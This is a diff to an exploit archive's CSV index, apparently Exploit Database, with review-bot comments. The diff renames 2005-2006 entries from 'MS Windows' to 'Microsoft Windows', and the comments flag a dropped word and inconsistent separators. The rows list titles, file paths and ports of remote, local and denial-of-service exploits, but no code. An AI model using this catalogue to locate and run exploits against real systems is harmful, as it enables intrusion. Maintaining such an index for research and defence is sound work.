+1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0
 1144,platforms/windows/remote/1144.html,"MS Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0
 1145,platforms/php/webapps/1145.pm,"Wordpress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0
-1146,platforms/windows/remote/1146.c,"MS Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139
+1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139
 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000
-1149,platforms/windows/remote/1149.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
+1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
 1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,N/A,windows,remote,1761
 1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,N/A,windows,remote,143
 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 iMonitor Remote Stack Overflow",2005-08-12,N/A,windows,remote,8008
@@ -975,9 +975,9 @@ id,file,description,date,author,platform,type,port
 1174,platforms/windows/local/1174.c,"ZipTorrent <= 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0
 1175,platforms/cgi/webapps/1175.pl,"GTChat <= 0.95 Alpha (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,webapps,0
 1176,platforms/multiple/dos/1176.c,"Ventrilo <= 2.3.0 - Remote Denial of Service Exploit (all platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0
-1178,platforms/windows/remote/1178.c,"MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0
-1179,platforms/windows/remote/1179.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445
-1180,platforms/windows/remote/1180.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (french fix)",2005-08-25,"Fabrice Mourron",windows,remote,445
+1178,platforms/windows/remote/1178.c,"Microsoft Windows IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0
+1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445
+1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (French Fix)",2005-08-25,"Fabrice Mourron",windows,remote,445
 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0
 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0
@@ -993,8 +993,8 @@ id,file,description,date,author,platform,type,port
 1193,platforms/windows/remote/1193.pl,"Free SMTP Server <= 2.2 Spam Filter Vulnerability",2005-09-02,basher13,windows,remote,0
 1194,platforms/cgi/webapps/1194.c,"man2web <= 0.88 Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0
 1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0
-1197,platforms/windows/local/1197.c,"MS Windows (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
-1198,platforms/windows/local/1198.c,"MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0
+1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
+1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0
 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0
 1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0
 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager <= 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0
@@ -1050,7 +1050,7 @@ id,file,description,date,author,platform,type,port
 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0
 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0
 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server Preauthentication Directory Listing Exploit (meta)",2005-10-19,Optyx,hp-ux,remote,0
-1260,platforms/windows/remote/1260.pm,"MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,80
+1260,platforms/windows/remote/1260.pm,"Microsoft Windows IIS - SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,80
 1261,platforms/hp-ux/remote/1261.pm,"HP-UX <= 11.11 lpd Remote Command Execution Exploit (meta)",2005-10-19,"H D Moore",hp-ux,remote,515
 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 CAM log_security() Stack Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,4105
 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722
@@ -1059,9 +1059,9 @@ id,file,description,date,author,platform,type,port
 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 - 0.10.12 SLIMP3 Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0
 1267,platforms/linux/local/1267.c,"XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0
 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0
-1269,platforms/windows/dos/1269.c,"MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,N/A,windows,dos,0
+1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,N/A,windows,dos,0
 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0
-1271,platforms/windows/dos/1271.c,"MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0
+1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0
 1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0
 1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0
 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0
@@ -1104,7 +1104,7 @@ id,file,description,date,author,platform,type,port
 1325,platforms/php/webapps/1325.pl,"PHPWebThings <= 1.4 (forum) SQL Injection Exploit",2005-11-16,AhLam,php,webapps,0
 1326,platforms/php/webapps/1326.pl,"PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit",2005-11-16,N/A,php,webapps,0
 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC",2005-11-16,"Luca Ercoli",windows,dos,0
-1328,platforms/windows/dos/1328.c,"MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit",2005-11-16,"Winny Thomas",windows,dos,0
+1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak DoS Exploit",2005-11-16,"Winny Thomas",windows,dos,0
 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0
 1330,platforms/windows/remote/1330.c,"FreeFTPD <= 1.0.8 (USER) Remote Buffer Overflow Exploit",2005-11-17,Expanders,windows,remote,21
 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0
@@ -1115,11 +1115,11 @@ id,file,description,date,author,platform,type,port
 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0
 1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0
 1340,platforms/php/webapps/1340.php,"eFiction <= 2.0 Fake GIF Shell Upload Exploit",2005-11-25,rgod,php,webapps,0
-1341,platforms/windows/dos/1341.c,"MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0
+1341,platforms/windows/dos/1341.c,"Microsoft Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0
 1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0
-1343,platforms/windows/dos/1343.c,"MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0
+1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0
 1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0
-1346,platforms/windows/dos/1346.c,"MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
+1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0
 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0
 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0
@@ -1145,8 +1145,8 @@ id,file,description,date,author,platform,type,port
 1373,platforms/php/webapps/1373.php,"Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0
 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0
 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105
-1376,platforms/windows/dos/1376.c,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0
-1377,platforms/windows/dos/1377.pl,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0
+1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0
+1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0
 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
@@ -1161,7 +1161,7 @@ id,file,description,date,author,platform,type,port
 1391,platforms/windows/remote/1391.pm,"Windows XP/2003 Metafile Escape() Code Execution Exploit (meta)",2005-12-27,"H D Moore",windows,remote,0
 1394,platforms/windows/dos/1394.html,"MS Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0
 1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0
-1396,platforms/windows/dos/1396.cpp,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0
+1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0
 1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - (CPL 0) Local Root Exploit (k-rad3.c)",2005-12-30,alert7,linux,local,0
 1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0
 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0
@@ -1172,7 +1172,7 @@ id,file,description,date,author,platform,type,port
 1404,platforms/windows/local/1404.c,"WinRAR 3.30 Long Filename Buffer Overflow Exploit (more targets) (2)",2006-01-04,c0d3r,windows,local,0
 1405,platforms/php/webapps/1405.pl,"FlatCMS <= 1.01 (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0
 1406,platforms/windows/local/1406.php,"PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit",2006-01-05,mercenary,windows,local,0
-1407,platforms/windows/local/1407.c,"MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
+1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit",2006-01-07,FistFuXXer,windows,remote,80
 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit",2006-01-07,FistFuXXer,windows,dos,0
 1410,platforms/php/webapps/1410.pl,"Magic News Plus <= 1.0.3 Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0
@@ -1185,7 +1185,7 @@ id,file,description,date,author,platform,type,port
 1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003
 1418,platforms/asp/webapps/1418.txt,"MiniNuke <= 1.8.2 - Multiple SQL Injection Vulnerabilities",2006-01-14,nukedx,asp,webapps,0
 1419,platforms/asp/webapps/1419.pl,"MiniNuke <= 1.8.2 (news.asp hid) SQL Injection Exploit",2006-01-14,DetMyl,asp,webapps,0
-1420,platforms/windows/remote/1420.c,"MS Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0
+1420,platforms/windows/remote/1420.c,"Microsoft Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0
 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701
 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0
 1423,platforms/windows/dos/1423.html,"MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0
@@ -1209,7 +1209,7 @@ id,file,description,date,author,platform,type,port
 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21
 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta)",2006-02-01,y0,windows,remote,21
 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0
-1465,platforms/windows/local/1465.c,"MS Windows Services ACLs Local Privilege Escalation Exploit (updated)",2006-02-12,"Andres Tarasco",windows,local,0
+1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)",2006-02-12,"Andres Tarasco",windows,local,0
 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25
 1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0
 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0
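Review bot: The new title for entry 1465 drops the word "Services" along with the prefix change: the old line read `MS Windows Services ACLs Local Privilege Escalation Exploit (updated)` and the new one reads `Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)`. The other renames visible in this diff keep the component name, so this looks unintended. Anyone who searches the index by component name while triaging a host would no longer match this row. I would keep the component in the description field: `"Microsoft Windows - Services ACLs Local Privilege Escalation Exploit (Updated)"`.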
@@ -1245,9 +1245,9 @@ id,file,description,date,author,platform,type,port
 1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0
 1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0
 1503,platforms/php/webapps/1503.pl,"YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0
-1504,platforms/windows/remote/1504.pm,"MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta)",2006-02-17,"H D Moore",windows,remote,0
-1505,platforms/windows/remote/1505.html,"MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0
-1506,platforms/windows/remote/1506.c,"MS Windows Color Management Module Overflow Exploit (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0
+1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow Exploit (MS06-006) (meta)",2006-02-17,"H D Moore",windows,remote,0
+1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow Exploit (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0
+1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0
 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 (referer) Remote Command Execution Exploit",2006-02-17,RusH,cgi,webapps,0
 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 (rollid) Remote SQL Injection Exploit",2006-02-17,RusH,php,webapps,0
 1510,platforms/php/webapps/1510.pl,"Gravity Board X <= 1.1 (csscontent) Remote Code Execution Exploit",2006-02-17,RusH,php,webapps,0
@@ -1260,7 +1260,7 @@ id,file,description,date,author,platform,type,port
 1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0
 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
 1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0
-1520,platforms/windows/remote/1520.pl,"MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3)",2006-02-22,"Matthew Murphy",windows,remote,0
+1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow Exploit (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0
 1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0
 1522,platforms/php/webapps/1522.php,"NOCC Webmail <= 1.0 (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0
 1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit",2006-02-23,unitedbr,php,webapps,0
@@ -1322,7 +1322,7 @@ id,file,description,date,author,platform,type,port
 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0
 1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
 1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25
-1584,platforms/windows/local/1584.cpp,"MS Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0
+1584,platforms/windows/local/1584.cpp,"Microsoft Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0
 1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0
 1586,platforms/php/webapps/1586.php,"php iCalendar <= 2.21 (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0
 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit",2006-03-15,uid0,php,webapps,0
@@ -1337,11 +1337,11 @@ id,file,description,date,author,platform,type,port
 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0
 1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0
 1598,platforms/windows/dos/1598.html,"MS Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0
-1599,platforms/windows/dos/1599.cpp,"MS Windows XP/2003 (IGMP v3) - Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0
+1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) - Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0
 1600,platforms/php/webapps/1600.php,"FreeWPS <= 2.11 (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0
 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0
 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow Exploit",2006-03-22,"esca zoo",multiple,remote,11000
-1603,platforms/windows/dos/1603.c,"MS Windows XP/2003 - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0
+1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0
 1604,platforms/windows/dos/1604.html,"MS Internet Explorer 6.0 (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0
 1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0
 1606,platforms/windows/remote/1606.html,"MS Internet Explorer (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0
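Review bot: The two IGMP v3 rows in this hunk still end up with different separator layouts after the rename: 1599 becomes `Microsoft Windows 2003/XP - (IGMP v3) - Denial of Service Exploit (MS06-007)` with a dash on both sides of the parenthetical, while 1603 becomes `Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)`. The same doubled separator appears in the new title for 2412 in the `@@ -2105,7` hunk (`Microsoft Windows - (Windows Kernel) - Privilege Escalation Exploit`). If the goal of the commit is a uniform `Vendor Product Version - Title` shape, a single separator would make the 1599 and 1603 titles line up, e.g. `"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007)"` for 1599.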
@@ -1617,8 +1617,8 @@ id,file,description,date,author,platform,type,port
 1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0
 1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability",2006-06-13,Kacper,php,webapps,0
 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0
-1910,platforms/windows/local/1910.c,"MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0
-1911,platforms/windows/local/1911.c,"MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0
+1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) Vulnerability PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0
+1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0
 1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 (destination) File Include Vulnerability",2006-06-14,Kacper,php,webapps,0
 1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 (template.php) File Include Vulnerability",2006-06-14,"Federico Fazzi",php,webapps,0
 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
@@ -1647,7 +1647,7 @@ id,file,description,date,author,platform,type,port
 1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
 1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0
-1940,platforms/windows/remote/1940.pm,"MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
+1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
 1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0
 1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0
@@ -1672,8 +1672,8 @@ id,file,description,date,author,platform,type,port
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
 1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
-1965,platforms/windows/remote/1965.pm,"MS Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
